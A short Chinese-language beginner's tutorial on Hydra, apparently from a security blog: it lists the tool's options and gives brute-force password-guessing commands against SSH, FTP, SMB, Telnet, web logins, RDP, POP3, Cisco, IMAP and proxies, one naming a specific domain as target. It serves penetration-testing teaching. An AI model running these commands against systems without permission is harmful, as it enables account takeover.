hydra小白渗透路上必须掌握的工具,历史我就不介绍了百度上更详细,本内容仅供参考,切勿做违法犯罪,若出事一切与本人无关,请大家遵守网络安全法。祝大家早日成为安全界的大佬。
Hydra 参数介绍:
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-M 文件
-t 指定多线程数量,默认为16个线程
-x 最小值:MAX:CHARSET +,|
-C 文件 [,ID:密码]
使用hydra破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -ens IP ssh (将用户名密码输出到ssh.log文件)
hydra -L users.txt -P password.txt -V IP ssh (简便)
破解ftp:
hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -ens -vV
破解smb:
hydra -l administrator -P pass.txt IP smb
解telnet
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
get方式提交,破解web登录:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php
post方式提交,破解web登录:
hydra -L login.txt -P passlist.txt -vV -t 7 -e ns -f wy.qinglin.co(或ip) http-form-post
破解https:
hydra -m /index.php -l username -P pass.txt IP https
破解rdp(3389端口)
hydra IP rdp -l administrator -P pass.txt -V
破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解cisco:
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解imap:
hydra -L user.txt -p secret 192.168.0.132 imap PLAINhydra -C defaults.txt -6 imap://\[fe80::2c:31ff:fe12:ac11\]:143/PLAIN
破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
hydra的缺点:
1.稳定性差,程序时常崩溃。
2.速度控制不好,容易触发服务器屏蔽或锁死机制。
3.每主机新建进程,没服务新建实例。
大量目标破解时性能差。
网络安全,学无止境,日后会不断更新网络安全方面知识,包括ctf 等
求三连 求三连 求三连,重要的话说三遍